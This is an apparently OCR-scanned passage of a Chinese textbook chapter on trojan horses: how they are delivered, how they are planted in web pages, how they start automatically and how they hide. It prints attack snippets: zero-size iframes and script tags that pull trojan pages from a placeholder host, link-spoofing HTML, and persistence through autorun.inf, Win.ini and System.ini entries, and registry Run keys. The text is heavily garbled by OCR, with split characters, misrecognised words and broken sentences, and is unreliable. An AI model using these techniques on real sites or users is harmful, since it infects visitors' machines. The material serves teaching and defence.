木马 植 人 技术 是 木马 工作 流程 的 第 一 个 步骤 , 它 也 是 木马 能 不 能 成 为 实战 工具 的 先决 
1. 常用 的 植 入 手段 


(1) 邮件 植 入 。 木 马 被 放 在 邮件 的 附件 中 发 给 受害 者 , 当 受 害 者 在 没 采 取 任 何 措施 的 
情况 下 下 载 并 运行 了 该 附件 , 便 中 了 木马 。 因 此 ,对 于 带 有 附件 的 邮件 ,最 好 不 要 下 载运 行 ， 
尤其 是 附件 名 为 * . exe 的 。 

(2) IM 传播 。 因 为 IM(QQ、MSN 等 ) 有 文件 传输 功能 ,所 以 现在 也 有 很 多 木马 通过 
IM 进行 传播 。 亚 意 破 坏 者 通常 把 木马 服务 程序 通过 合并 软件 和 其 他 的 可 执行 文件 绑 在 一 
起 ,然后 欺骗 受害 者 去 下 载运 行 。 如 果 受 害 者 相信 这 是 个 好 玩 的 东西 或 者 是 想 要 的 照片 , 当 
接受 并 运行 后 ,就 成 了 木马 的 牺牲 品 了 。 

(3) 下 载 传播 。 在 一 些 个 人 网 站 或 论坛 下 载 共 享 软件 时 有 可 能 会 下 载 到 绑 有 木马 的 程 
序 。 所 以 建议 要 下 载 共 享 软件 的 话 最 好 去 比较 知名 的 网 站 。 在 解压 缩 安 装 之 前 也 养 成 对 共 
享 软件 进行 病毒 扫描 的 习惯 。 

(4) 漏洞 植 和 人 人。 一 般 是 利用 系统 漏洞 或 应 用 程序 的 漏洞 ,把 配置 好 的 木马 在 目标 主 
机 上 运行 就 完成 了 。 这 种 方法 的 难点 是 要 掌握 漏洞 技术 。 例 如 ,IPC 漏洞 、Unicode 漏 
洞 等 。 


138 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


(5) 网 上 邻居 植 和 人。 网 上 邻居 即 共 享 入侵 。 当 受害 者 的 139 端口 是 开放 的 , 且 有 共享 
的 可 写 目 录 时 ,攻击 者 就 可 以 直接 将 木马 或 种 子 放 入 共享 目录 中 。 如 果 使 用 一 个 具有 诱惑 
性 的 名 称 , 或 者 使 用 一 个 具有 欺骗 性 的 扩展 名 ,受害 者 就 可 能 会 运行 这 个 程序 ,于 是 就 被 感 
染 了 。 

(6) 网 页 植 人 。 网 页 植 人 是 比较 流行 的 种 植木 马 方 法 , 接 下 来 的 章节 会 重点 讲解 这 种 
方法 。 黑 客 可 以 制作 一 个 ActiveX 控件 , 放 在 网 页 中 ,只 要 用 户 选择 了 安装 ,就 会 目 动 从 服 
务 器 上 下 载 一 个 木马 程序 并 运行 ,这 样 就 达到 植 人 木马 的 目的 了 。 按 此 方法 制作 的 木马 对 
任何 版 本 的 IE 都 有 效 , 但 是 在 打开 网 页 的 时 候 弹 出 对 话 杠 要 用 户 确定 是 否 安装 ,只 要 用 户 
不 安装 ,黑客 们 就 不 能 达到 目的 了 。 

另 一 类 种 植木 马 的 技术 主要 是 利用 微软 的 HTML Object 标签 的 一 个 漏洞 。Object 标 
签 主要 是 用 来 把 ActiveX 控件 插入 HTML 页 面 中 。 由 于 加 载 程 序 没 有 根据 描述 远程 
Object 数据 位 置 的 参数 检查 加 载 文件 的 性 质 , 因 此 Web 页 面 中 的 木马 会 悄悄 地 运行 。 对 于 
DATA 所 标记 的 URL ,IE 会 根据 服务 器 返回 HTTP 头 中 的 Content-Type 来 处 理 数据 ,也 
就 是 说 如 果 HTTP 头 中 返回 的 是 appication/hta 等 ,那么 该 文件 就 能 够 执行 ,而 不 管 IE 的 
安全 级 别 有 多 高 。 如 果 恶 意 攻 击 者 把 该 文件 换 成 木马 ,并 修改 其 中 FTP 服务 希 的 地 址 和 文 
件 名 ,将 其 改 为 他 们 的 FTP 服务 器 地 址 和 服务 器 上 木马 程序 的 路 径 。 那 么 当 别 人 浏览 该 网 
页 时 ,会 出 现 “Internet Explorer 脚本 错误 ”的 错误 信息 ,询问 是 否 继续 在 该 页 面 上 运行 错误 
脚本 , 当 单 击 “ 是 ”按钮 便 会 目 动 下 载 并 运行 木马 。 

还 有 一 种 网 页 木马 是 直接 在 网 页 的 源 代码 中 插入 木马 代码 ,只 要 对 方 打开 这 个 网 页 就 
会 中 上 木马 ,而 受害 者 对 此 还 一 无 所 知 。 

2. 首次 运行 

随 着 安全 意识 的 加 强 , 大 多 数 上 网 用 户 警 惕 性 越 来 越 高 , 想 骗 取 他 们 执行 木马 是 件 很 困 
难 的 事 。 即 使 不 是 计算 机 高 手 都 知道 ,一 见 到 是 陌生 的 EXE 文件 便 不 会 轻易 运行 它 , 因 而 
中 木马 的 机 会 也 就 相对 减少 了 。 对 于 此 ,黑客 们 是 不 会 甘心 的 ,于 是 想 尽 办 法 引诱 或 欺骗 用 
户 运 行 木马 (种 子 ) 。 


说 成 为 图 像 文 件 , 如 照片 等 ,应 该 说 这 是 一 个 最 不 符合 逻辑 的 方法 ,但 却 是 很 多 人 中 招 的 有 
效 而 又 实用 的 方法 。 

只 要 入 侵 者 扮 成 美女 或 其 他 诱惑 的 文件 名 ,再 假装 传送 照片 给 受害 者 ,受害 者 就 会 立刻 
执行 它 。 

(2) 程序 捆绑 欺骗 。 通 沼 有 经 验 的 用 户 ,是 不 会 将 图 像 文件 和 可 执行 文件 混 消 的 ,所 以 
很 多 入 侵 者 一 不 做 二 不 休 , 干 脆 将 木马 程序 说 成 是 应 用 程序 。 然 后 再 变 着 花样 欺骗 受害 者 ， 
例如 ,说 成 是 新 出 炉 的 游戏 、 无 所 不 能 的 黑客 程序 等 ,目的 是 让 受害 者 立刻 执行 它 。 而 木马 
程序 执行 后 一 般 是 没有 任何 反应 的 ,于 是 在 悄 无 声息 中 ,很 多 受害 者 便 以 为 是 传送 时 文件 损 
坏 了 而 不 再 理会 它 。 

如 有 果 有 更 小 心 的 用 户 , 上 面 的 方法 有 可 能 会 使 他 们 的 产生 怀疑 ,所 以 就 衍生 了 一 些 捆 缘 
程序 。 捆 绑 程序 是 可 以 将 两 个 或 以 上 的 可 执行 文件 (EXE 文件 ) 绪 合 为 一 个 文件 , 当 执 行 这 
个 组 谷 文件 时 ,两 个 可 执行 文件 就 会 同时 执行 。 如 果 入 侵 者 将 一 个 正常 的 可 执行 文件 (一 些 
小 游戏 如 wrap. exe) 和 一 个 木马 程序 捆绑 ， 由 于 执行 组 合 文 件 时 Wrap. eXe 会 正常 执行 , 受 
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害 者 在 不 知情 时 木马 程序 也 同时 执行 了 。 

常用 的 搁 绑 软件 有 joiner,Hammer Binder 等 。 

(3) 以 Z-file 伪装 加 密 程 序 。 黑 客 会 将 木马 程序 和 小 游戏 捆绑 ,再 用 Z-file 加 密 及 将 
此 “混合 体 ” 发 给 受害 者 ,由 于 看 上 去 是 图 像 文件 ,受害 者 往往 都 不 以 为 然 , 打 开 后 又 只 是 
一 般 的 图 片 ,最 可 怕 的 地 方 还 在 于 就 连 杀 毒 软件 也 检测 不 出 它 内 藏 特洛伊 木马 。 当 打消 
了 受害 者 警惕 性 后 ,再 让 他 用 WinZip 解压 缩 及 执行 伪装 体 , 这 样 就 成 功 地 安装 了 木马 
程序 。 

(4) 伪装 成 应 用 程序 扩展 组 件 。 此 类 属于 最 难 识 别 的 特洛伊 木马 。 黑 客 们 通常 将 木马 
程序 写成 任何 类 型 的 文件 (如 dll、ocx 等 ) 然 后 挂 在 一 个 十 分 出 名 的 软件 中 ,如 OICQ。 由 于 
OICQ 本 身 已 有 一 定 的 知名 度 ,没有 人 会 怀疑 它 的 安全 性 ,更 不 会 有 人 检查 它 的 文件 是 否 多 
了 。 而 当 受 害 者 打开 OICQ 时 ,这 个 有 问题 的 文件 即 会 同时 执行 。 此 种 方式 相 比 起 用 捆绑 
程序 有 一 个 更 大 的 好 处 , 那 就 是 不 用 更 改 被 入 侵 者 的 登录 文件 ,以 后 每 当 其 打开 OICQ 时 木 
马 程序 就 会 同步 运行 , 相 较 一 般 特 洛 伊 木马 可 说 是 “ 踏 雪 无 痕 ”。 

3. 网 站 挂 马 技术 

网 页 挂 马 就 是 攻击 者 在 正常 的 页 面 中 (通常 是 网 站 的 主页 ) 插 入 一 段 恶意 代码 。 浏 览 者 
在 打开 该 页 面 的 时 候 , 这 段 代码 被 执行 ,然后 把 某 木 马 的 服务 器 端 程 序 或 种 子 下 载 到 浏览 者 
本 地 并 运行 ,进而 控制 浏览 者 的 主机 。 网 站 被 挂 马 是 管理 员 们 无 论 如 何 都 无 法 忍受 的 。 
Web 服务 器 被 攻克 不 算 , 还 “ 城 门 失火 殊 及 池 鱼 ”, 网 站 的 浏览 者 也 不 能 幸免 。 这 无 论 是 对 
企业 的 信誉 ,还 是 对 管理 员 的 技术 能 力 都 是 沉重 的 打击 。 和 常见 的 网 站 挂 马 技术 包括 框架 挂 
马 \js 挂 马 、 图 片 伪 淡 挂 马 、 网 络 钓 鱼 挂 马 、 伪 波 挂 马 。 下 面 结 合 实例 对 网 页 挂 马 的 技术 进行 
分 析 。 

(1) 框架 挂 马 。 在 HTML 编程 中 ,iframe 语句 可 以 加 载 到 任意 网 页 中 并 执行 。 网 页 木 
马 攻 击 者 利用 这 种 技术 进行 框架 挂 马 。 框 架 挂 马 是 最 早 也 是 最 有 效 的 一 种 网 络 挂 马 技术 。 
通常 的 挂 马 用 的 代码 如 下 。 


< iframe. src= http://www.xxx.com/muma. html width = 0 height = 0></iframe > 


上 面 这 句 代 码 的 意思 是 ,在 打开 插入 该 句 代 码 的 网 页 后 ,也 就 打开 了 http://www. 
XXX. com/muma. html 页 面 , 但 是 由 于 它 的 长 和 宽 都 为 “0”， 因此 很 难 察 觉 ,非常 具有 隐 
珊 性 。 

(2) js 挂 马 。js 挂 马 是 一 种 利用 js 脚本 文件 调用 的 原理 进行 的 网 页 挂 马 技术 ,这 种 挂 
马 技术 也 非常 隐蔽 。 例 如 ,黑客 可 以 先 制 作 一 个 .js 文件 ,然后 利用 js 代码 调用 到 挂 马 的 网 
页 。 通 第 代码 如 下 。 


< Script. language = javascript. src = http://www.xxx.com/gm.js></script> 


在 上 面 这 句 代 码 中 ,http://www. xxx. com/gm. js 就 是 一 个 js 脚本 文件 ,攻击 者 通过 
它 调 用 和 执行 木马 的 服务 端 。 这 些 js 文件 一 般 都 可 以 通过 工具 生成 ,攻击 者 只 需 输 入 相关 
的 选项 就 可 以 了 。 

(3) 图 片 伪 装 挂 马 。 随 着 防毒 技术 的 发 展 , 黑 客 手段 也 不 停 地 更 新 ,图 片 伪 装 挂 马 技术 
是 逃避 杀毒 监视 的 新 技术 。 攻 击 者 将 木马 代码 植 人 到 test. jpg 图 片 文件 中 ,这 些 般 入 代码 
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的 图 片 都 可 以 用 工具 生成 ,攻击 者 只 需 输入 相关 的 选项 就 可 以 了 。 图 片 木马 生成 后 ,再 利用 
代码 调用 执行 ,是 比较 新 络 的 一 种 挂 马 隐蔽 方法 ,示例 代码 如 下 。 


< iframe. src= "http://www. xxx. com/test. htm" height = 0 width = 0 > </iframe > 
< img src = "http://www. xxx. com/test. jpg"></center > 


这 两 句 代 人 码 的 意思 是 , 当 用 户 打开 http://www. xxx. com/test. htm 时 ,显示 给 用 户 的 
http://www. xxx. com/test. jpg, 而 http://www. xxx. com/test. htm 网 页 代码 也 随 之 


Mi 并 
一 人 、 


(4) 网 络 钓鱼 挂 马 。 钓 鱼 是 网 络 中 最 常见 的 欺骗 手段 ,黑客 们 利用 人 们 的 猎奇 \、 贪 禁 等 
心理 ,伪装 构造 一 个 链接 或 者 一 个 网 页 ,利用 社会 工程 学 欺骗 方法 ,引诱 受害 者 来 单 击 。 当 
受害 者 打开 一 个 看 似 正常 的 页 面 时 ,木马 代码 随 之 运行 ,隐蔽 性 极 高 。 这 种 方式 往往 会 欺骗 
用 户 输入 某 些 个 人 隐私 信息 ,然后 穷 取 个 人 隐私 相关 联 。 例 如 ,攻击 者 模仿 腾讯 公司 设计 了 
一 个 获取 QQ 币 的 页 面 ,引诱 输入 QQ 账号 和 口令 。 等 用 户 输入 完 提交 后 ,就 把 这 些 信息 发 
送 到 攻击 者 指定 的 地 方 。 

(5) 伪装 挂 马 。 伪 装 挂 马 是 高 级 欺骗 技术 之 一 。 黑 客 利 用 IE 或 者 Fixfox 浏览 器 的 设 
计 缺 陷 制 造 的 一 种 高 级 欺骗 技术 , 当 用 户 访问 木马 页 面 时 地 址 栏 显 示 www. sina. com 或 者 
security. ctocio. com. cn 等 用 户 信 任 地 址 ,其 实 却 打 开 了 被 挂 马 的 页 面 ,从 而 实现 欺骗。 示 
例 代码 如 下 。 


<p><a id= "qipian" href = "http://www. hacker. com.cn"></a></p> 
<a href = "http://safe. it168.com" target =" blank"> 
<table> 

< Capt1lon > 

< label for = "qipian"> 

<u style = "cursor;pointer; color; blue"> 

</ UU> 

</caption > 

</table> 

</a> 

</div> 


上 面 代 码 的 效果 ,在 貌似 http;//safe. it168. com 的 链接 上 单 击 却 打开 了 http://www. 
hacker. com. cn 网 站 。 


5.3.2 自 司 动 技术 


木马 植 和 人 受害 系统 的 难度 非常 大 ,因此 ,不 能 每 次 都 依 徘 植 人 技术 来 局 动 木马 。 一 且 成 
功 植 入 ,木马 可 以 徘 一 些 日 动手 段 在 被 害 系 统 重启 时 加 载 卓 己 。 这 些 技术 如 下 。 

1. 修改 批 处 理 

这 是 一 种 很 古老 的 方法 ,但 至 今 仍 有 木马 在 使 用 。 这 种 技术 一 般 通 过 修改 下 列 3 个 文 
件 来 实现 。 

(1) Autoexec. bat( 上 月 动 批 处 理 ,在 引导 系统 时 执行 )。 

(2) Winstart. bat( 在 启动 GUI 图 形 界 面 环境 时 执行 )。 
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(3) Dosstart. bat( 在 进入 MS-DOS 方式 时 执行 )。 
例如 ,编辑 C:\windows\Dosstart. bat, 加 入 start Notepad, 当 进入 “MS-DOS 方式 ”时 ， 
就 可 以 看 到 记事 本 被 启动 了 。 


2. 修改 系统 配置 


这 是 经 常 使 用 的 方法 之 一 ,通过 修改 系统 配置 文件 System. ini、Win. ini 来 达到 自动 运 
行 的 目的 ,涉及 范围 如 下 。 

在 Win. ini 文件 中 : 

[windows ] 


load = 程序 名 
run= 程序 名 


在 System. ini 文件 中 : 


[boot] 
shell = Explorer. exe 


其 中 修改 System. ini 中 Shell 值 的 情况 要 多 一 些 , 病 毒 木 马 通 过 修改 这 里 使 自己 成 为 
Shell ,然后 加 载 Explorer. exe,; 从 而 达到 控制 用 户 计算 机 的 目的 。 


.借助 自动 播放 功能 

在 被 木马 程序 应 用 之 前 ,该 方法 不 过 是 被 发 烧 友 用 来 修改 人 硬盘 的 图 标 而 已 ,如今 它 被 赋 
耶 了 新 的 意义 ,黑客 甚至 声称 这 是 Windows 的 新 Bug。 

Windows 的 目 动 播放 功能 确实 有 很 多 弊端 ,早年 许多 用 户 因 为 上 日 动 运行 的 光盘 中 市 有 
CIH 病毒 而 “中 招 ” ,现在 不 少 软件 可 以 方便 地 禁止 光盘 的 月 动 运行 ,但 人 硬盘 呢 ? 其 实 硬 盘 
也 文 持 自动 运行 ,可 尝试 在 D 盘 根 目 录 下 新 建 一 个 Autorun. inf ,用 记事 本 打开 它 , 输 入 如 
下 内 容 。 

[autorun ] 

open = Notepad. exe 


保存 后 进入 “我 的 电脑 ”, 按 F5 键 刷 新 ,然后 双击 D 盘 盘 符 ,记事 本 打开 了 ,而 D 盘 却 没 
有 打开 。 

当然 ,以 上 只 是 一 个 简单 的 示例 ,黑客 做 得 要 精密 很 多 ,他 们 会 把 程序 改名 为 ”. 
ST s 格 ) ,这 样 在 Autorun. el open 一 ”, 而 后 边 的 内 容 被 忽略 ， 和 

行径 常 在 修改 系统 配置 时 使 用 ,如 “run 二 ”。 为 了 更 好 地 隐藏 日 己 ,其 程序 运行 后 ,还 会 打开 
硬盘 ,使 人 难以 觉察 。 

由 此 可 以 推 想 , 如 果 打 开 了 DD 盘 的 共享 ,黑客 就 可 以 将 木马 和 一 个 Autorun. inf 存 人 该 
分 区 中 , 当 Windows 日 动 刷 新 时 ,也 就 “中 招 ” 了 ,因此 , 千 万 不 要 共享 任何 根 目 录 , 当 然 更 不 
能 共享 系统 分 区 。 

通过 注册 表 中 的 Run 来 启动 

这 也 是 一 个 很 老 的 方法 ,但 大 多 数 的 黑客 仍 在 使 用 这 种 方法 。 通 过 在 Run、RunOnce、 

RunOnceEx、RunServices 以 及 RunServicesOnce 中 添加 键 值 ,可 以 比较 容易 地 实现 程序 的 
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加 载 。 墨 客 尤 其 喜欢 在 市 Once 的 主键 中 做 手脚 。 在 程序 运行 后 ,如 果木 马上 月 动 将 键 值 删 
除 , 当 用 户 使 用 注册 表 修 改 程序 查看 时 就 不 会 发 现 异 样 。 在 退出 时 (或 关闭 系统 时 ) ,木马 程 
序 又 目 动 添加 上 需要 的 键 值 , 达 到 隐藏 目 己 的 目的 。 

5. 通过 文件 关联 启动 

这 是 一 种 很 受 黑客 喜爱 的 方式 ,通过 EXE 文件 的 关联 (主键 为 exefile) ,让 系统 在 执行 
任何 程序 之 前 都 运行 木马 。 通 篆 修 改 的 还 有 txtfile( 文 本 文件 的 关联 ) ,regfile( 注 册 表 文件 
关联 ,一般 用 来 防止 用 户 恢 复 注 册 表 ,如 双击 . reg 文件 就 关闭 计算 机 )、unkown( 未 知 文件 
关联 ) 。 为 了 防止 用 户 恢复 注册 表 , 用 此 方法 的 黑客 通常 还 连带 清除 scanreg. exe、sfc. exe、 
Extrac32. exe 和 regedit. exe 等 程序 ,以 阻碍 用 户 修 复 。 

6. 通过 API HOOK 启动 


这 种 方法 较为 高 级 ,通过 替换 系统 的 DLL 文件 ,让 系统 启动 指定 的 程序 。 例 如 ,拨号 上 
网 的 用 户 必 须 使 用 Rasapi32. dll 中 的 API 函数 来 进行 连接 ,那么 黑客 就 会 蔡 换 这 个 DLL ， 
当 应 用 程序 调用 这 个 API 哺 数 时 ,黑客 的 程序 就 会 先 启 动 ,然后 调用 真正 的 函数 完成 这 个 
功能 (特别 提示 : 木马 可 不 一 定 是 EXE, 还 可 以 是 DLL 或 VxD), 这 样 既 方便 又 隐蔽 (不 上 
网 时 根本 不 运行 )。 如 果 感 染 了 此 种 病毒 ,只 能 重 装 系统 。 

7. 通过 VxD 启动 

此 方法 也 是 较 高 级 的 方法 之 一 ,通过 把 木马 写成 VxD 形式 加 载 ,直接 控制 系统 底层 。 
这 种 方法 极为 罕见 ,它们 一 般 在 注册 表 “HKEY_ LOCAL _MACHINE\System\Current 
ControlSet\Services\VxD” 主 键 中 启动 ,很 难 发 党, 解决 方法 最 好 也 是 用 Ghost 恢复 或 重新 

8. 通过 浏览 网 页 启动 

这 种 方法 利用 了 MIME 的 漏洞 。 这 是 2001 年 黑客 中 最 流行 的 手法 ,因为 它 简 单 有 效 ， 
加 上 宽带 网 的 流行 , 令 用 户 防不胜防 。 想 一 想 , 仅 仅 是 鼠标 变 一 下 “沙漏 ”, 木 马 就 安装 妥当 ， 
Internet 真是 太 “ 方 便 * 了 。 不 过 近年 来 这 种 方法 的 使 用 有 所 减少 ,一 方面 许多 人 都 改 用 高 
版 本 的 浏览 器 , 男 一 方面 ,大 部 分 个 人 主页 空间 都 不 允许 上 传 . eml 文件 了 。 

MIME 被 称 为 多 用 途 Internet 邮件 扩展 (Multipurpose Internet Mail Extensions) , 是 
一 种 技术 规范 , 原 用 于 电子 邮件 ,现在 也 可 以 用 于 浏览 器 。MIME 对 邮件 系统 的 扩展 是 巨 
大 的 ,在 它 出 现 前 ,邮件 内 容 如 果 包 含 声音 和 动画 ,就 必须 把 它 变 为 ASCII 码 或 把 二 进 制 的 
信息 变 成 可 以 传送 的 编码 标准 ,而 接收 方 必须 经 过 解码 才 可 以 获得 声音 和 图 画 信 息 。 
MIME 提供 了 一 种 可 以 在 邮件 中 附加 多 种 不 同 编码 文件 的 方法 ,这 与 原来 的 邮件 是 大 不 相 
同 的 。 而 现在 MIME 已 经 成 为 了 HTTP 协议 标准 的 一 部 分 。 

9. 利用 Java Applet 

跨 时 代 的 Java 更 高 效 .更 方便 ,但 也 能 悄悄 地 修改 注册 表 , 让 用 户 千 百 次 地 访问 黄 ( 黑 ) 
色 网 站 ,让 用 户 关 不 了 机 ,还 可 以 让 用 户 中 木马 。 这 种 方法 其 实 很 简单 , 先 利 用 HTML 把 
木马 下 载 到 计算 机 的 缓存 中 ,然后 修改 注册 表 , 指 向 其 程序 。 

10. 利用 系统 自动 运行 的 程序 

这 一 条 主要 利用 用 户 的 麻痹 大 意 和 系统 的 运行 机 制 进 行 ,命中 率 很 高 。 在 系统 运行 过 
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程 中 ,有 许多 程序 是 自动 运行 的 。 例 如 ,磁盘 空间 已 满 时 ,系统 自动 运行 “磁盘 清理 ”程序 
(cleanmgr. exe)。 启 动 资源 管理 带 失 败 时 ,双击 果 面 将 自动 运行 “任务 管理 器 ”程序 
(Taskman. exe)。 格 式 化 磁盘 完成 后 ,系统 将 提示 使 用 “磁盘 扫描 ”程序 (scandskw. exe) 。 
单 击 “ 帮 助 ”菜单 或 按 Fl 键 时 ,系统 将 运行 Winhelp. exe 或 Hh. exe 打开 玫 助 文件 。 局 动 
时 ,系统 将 自动 启动 “系统 栏 ” 程 序 (SysTray. exe)“ 输 入 法 ”程序 (internat. exe) 以 及 “注册 
表 检 查 ” 程 序 (scanregw. exe) “计划 任务 ?程序 (Mstask. exe) 以 及 “电源 管理 ”程序 等 。 

以 上 机 制 都 为 恶意 程序 提供 了 机 会 ,通过 和 覆 亲 这 些 文件 ,不 必修 改 任何 设置 系统 就 会 日 
动 执 行 它们 。 而 用 户 在 检查 注册 表 和 系统 配置 时 也 不 会 有 任何 怀疑 ,例如 ,“ 注 册 表 检查 ” 程 
序 的 作用 是 启动 时 检查 和 备份 注册 表 , 正 常情 况 不 会 有 任何 提示 ,那么 它 被 履 盖 后 真 可 谓 是 
“ 神 不 知 、 鬼 不 觉 ”。 当 然 ,这 也 许 会 被 “系统 文件 检查 天 ”检查 出 来 。 

黑客 还 有 一 个 “ 价 天 换 日 ”的 高 招 ,不 覆盖 程序 也 可 达到 这 个 目的 。 这 种 方法 是 利用 
System 目录 比 Windows 目录 优先 的 特点 ,以 相同 的 文件 名 ,将 程序 放 到 System 目录 中 。 
读者 可 以 试 试 ,将 Notepad. exe 复制 到 System 目录 中 ,并 改名 为 Regedit. exe( 注 册 表 编辑 
大 ) ,然后 在 “开始 ”一 “运行 "文本 框 输入 “Regedit” 并 按 Enter 键 , 会 发 现 运行 的 竟然 是 那个 
假冒 的 Notepad. exe。 由 于 这 种 方法 大 部 分 目标 程序 不 是 经 党 被 系统 调用 ,因此 常 被 黑客 
用 来 作为 文件 被 删除 后 的 恢复 方法 。 

11. 其 他 方法 

黑客 还 常常 使 用 名 字 欺 骗 技 术 和 运行 假象 与 之 配合 。 上 述 的 全 角 空 格 主 文件 名 “. exe” 
就 是 一 例 名 字 欺 骗 技 术 。 男 外 ,和 营 见 的 有 在 修改 文件 关联 时 ,使 用 特殊 字符 (例如 使 用 
ASCII 值 255, 输 入 时 先 按 下 Alt 键 ,然后 在 小 键盘 上 输入 255) 作 为 文件 名 , 当 这 个 字符 出 
现在 注册 表 中 时 ,人 们 往往 很 难 发 现 它 的 存在 。 此 外 还 有 利用 字符 相似 性 的 ,如 Systray. 
exe 和 5ystray(5 与 大 写 S 相似 ); 长 度 相 似 性 的 ,如 Explorer. exe 和 Explore. exe( 后 者 比 
前 者 少 一 个 字母 ,心理 学 实验 证 明 , 人 的 第 一 感觉 只 识别 前 四 个 字母 ,并 对 长 度 不 敏感 )。 运 
行 假象 则 是 指 运行 某 些 木马 时 ,程序 给 出 一 个 虚假 的 提示 来 欺骗 用 户 。 一 个 运行 后 什么 都 
没有 的 程序 ,也 许 会 引起 大 家 的 注意 ,但 对 于 一 个 提示 ”内存 不 足 的 程序 ”仆人 不 会 引起 多 
少 人 的 重视 。 


5.3.3 隐藏 技术 


木马 为 了 生存 ,使 用 许多 技术 隐藏 目 己 的 行为 (进程 .连接 和 端口 )。 在 Windows 9x 时 
代 , 木 马 简单 地 注册 为 系统 进程 就 可 以 从 任务 栏 中 消失 。 在 Windows XP 及 以 后 版 本 中 ,这 
种 方法 遭 到 了 惨败 ,注册 为 系统 进程 不 仅 能 在 任务 栏 中 看 到 ,而且 可 以 直接 在 Services 中 控 
制 木 马 。 使 用 隐藏 窗 体 或 控制 台 的 方法 也 不 能 欺骗 无 所 不 见 的 Administrator 用 户 。 在 
Windows NT/Windows 2000/Windows XP 下 ,Administrator 是 可 以 看 见 所 有 进程 的 。 防 
火 墙 和 各 种 网 络 工具 的 发 展 也 对 木马 提出 了 进一步 的 考验 ,通信 过 程 容易 被 发 现 。 本 节 的 
内 容 主 要 总 结 目 前 用 于 木马 隐藏 的 各 种 技术 ,非常 值得 学 习 和 人 研究 。 

1. 反弹 式 木马 技术 

网 络 安全 和 现实 生活 中 的 情形 往往 有 惊人 的 相似 , 它 也 重复 着 “完善 习 汤 洞 习 青 完 善 ” 
这 样 一 个 螺旋 式 发 展 的 过 程 。 木 马 与 防火 墙 的 对 话 , 也 有 着 这 样 的 过 程 。 特 洛 伊 木 马 这 样 
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一 种 黑客 技术 ,一 出 现 就 引起 了 人 们 的 关注 。 除 了 从 不 同 的 角度 防范 木马 行为 的 发 生 ,防火 
墙 技术 的 发 展 也 有 效 地 遏制 了 木马 的 泛滥 。 

但 是 有 些 用 户 还 是 发 现 , 即 使 将 自己 的 防火 墙 设置 为 禁止 外 来 主动 连接 ,防范 了 理论 上 
的 木马 ,也 无 法 排除 信息 泄露 的 可 能 。 网 络 利 用 率 常常 居 高 不 下 ,不 正常 的 连接 还 是 会 频繁 
出 现 。 那 么 ,现在 就 不 得 不 关注 木马 技术 的 新 发 展 一 一 反弹 式 木马 。 

(1) 反弹 式 木 马 的 概念 。 大 家 知道 ,所 谓 的 “特洛伊 木马 ”, 就 是 一 种 基于 客户 机 /服务 
器 模式 的 远程 控制 程序 , 它 让 用 户 的 计算 机 运行 服务 器 端的 程序 ,这 个 服务 器 端的 程序 会 在 
用 户 的 计算 机 上 打开 监听 的 端口 。 这 就 给 黑客 人 侵 用 户 计 算 机 打开 了 一 扇 进 出 的 门 ,通过 
它 黑客 就 可 以 利用 木马 的 客户 端 入 侵 用 户 的 计算 机 系统 。 

随 着 防火 墙 技术 的 提高 和 发 展 , 基 于 IP 包 过 滤 规 则 来 拦截 木马 程序 可 以 有 效 地 防止 外 
部 连接 ,因此 黑客 在 无 法 取得 连接 的 情况 下 ,也 就 无 所 作为 了 。 

然而 ,“ 道 高 一 尺 , 麻 高 一 丈 ” 这 个 安全 领域 中 的 “规律 ”无 时 不 在 起 作用 。 聪 明 的 木马 编 
制 者 又 发 明了 所 谓 的 “反弹 式 木 马 ”。 它 利用 防火 墙 对 内 部 发 起 的 连接 请 求 无 条 件 信 任 的 特 
点 ,假冒 是 系统 的 合法 网 络 请 求 来 取得 对 外 的 端口 ,再 通过 某 些 方式 连接 到 木马 的 客户 端 ， 
从 而 锚 取 用 户 计 算 机 的 资料 ,同时 遥控 计算 机 本 和 喘 。 

(2) 反弹 式 木 马 的 原理 。 常 见 的 普通 木马 是 驻 留 在 用 户 计算 机 中 的 一 段 服务 程序 ,而 
攻击 者 控制 的 则 是 相应 的 客户 端 程序 。 服 务 程序 通过 特定 的 端口 ,打开 用 户 计算 机 的 连接 
资源 。 一 旦 攻击 者 所 和 擎 握 的 客户 端 程序 发 出 请 求 ,木马 便 和 它 连 接 起 来 ,将 用 户 的 信息 禄 取 
出 去 。 这 类 木马 的 一 般 工 作 模式 如 图 5-3 所 示 。 


5-3 ”特洛伊 木马 的 一 般 工 作 原 理 


可 见 , 此 类 木马 的 最 大 弱点 在 于 攻击 者 必须 和 目标 主机 建立 连接 ,木马 才能 起 作用 。 所 
以 在 对 外 部 连接 审查 严格 的 防火 墙 策 略 下 ,这 样 的 木马 很 难 工 作 起 来 。 
反弹 式 木 马 在 工作 原理 上 就 与 常见 的 木马 不 一 样 。 图 5-4 所 示 的 是 反弹 式 木马 的 一 般 
工作 原理 。 由 于 反弹 式 木 马 使 用 的 是 系统 信任 的 端口 ,系统 会 认为 木马 是 普通 应 用 程序 ,而 
不 对 其 连接 进行 检查 。 防 火 墙 在 处 理 内 部 发 出 的 连接 时 ,也 就 信任 了 反弹 式 木 马 。“ 网 络 神 
偷 ” 是 目前 最 常见 的 一 种 反弹 式 木 马 , 它 的 工作 原理 就 是 这 样 的 。 这 充分 说 明了 一 条 至 理 名 
: 保 仅 总 是 从 内 部 被 突破 的 。 
(3) 如 何 防范 反弹 式 木 马 。 推 荐 大 家 使 用 个 人 防火 墙 ,其 采用 独特 的 “内 墙 ” 方 式 应 用 
程序 访问 网 络 规则 ,专门 对 付 存 在 于 用 户 计 算 机 内 部 的 各 种 不 法 程序 对 网 络 的 应 用 ,从 而 可 
以 有 效 地 防御 像 * 反 弹 式 木马 ”那样 的 骗取 系统 合法 认证 的 非法 程序 。 当 用 户 计算 机 内 部 的 
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应 用 程序 访问 网 络 的 时 候 , 必 须 经 过 防火 墙 内 墙 的 审核 。 合 法 的 应 用 程序 被 审核 通过 ,而 非 
法 的 应 用 程序 将 会 被 防火 墙 的 内 墙 ” 所 拦截 。 

2. 用 ICMP 方法 隐藏 连接 

一 般 的 木马 都 是 通过 建立 TCP 连接 来 进行 命令 和 数据 的 传递 的 ,但 是 这 种 方法 有 一 个 
致命 的 漏洞 ,就 是 木马 在 等 竺 和 和 运行 的 过 程 中 ,始终 有 一 个 和 外 界 联 系 的 端口 打开 痢 , 这 是 
木马 的 弱点 所 在 ,也 是 高 手 们 查找 木马 的 杀手 铀 之 一 。 而 木马 也 是 在 斗争 中 不 断 进 步 ,不 断 
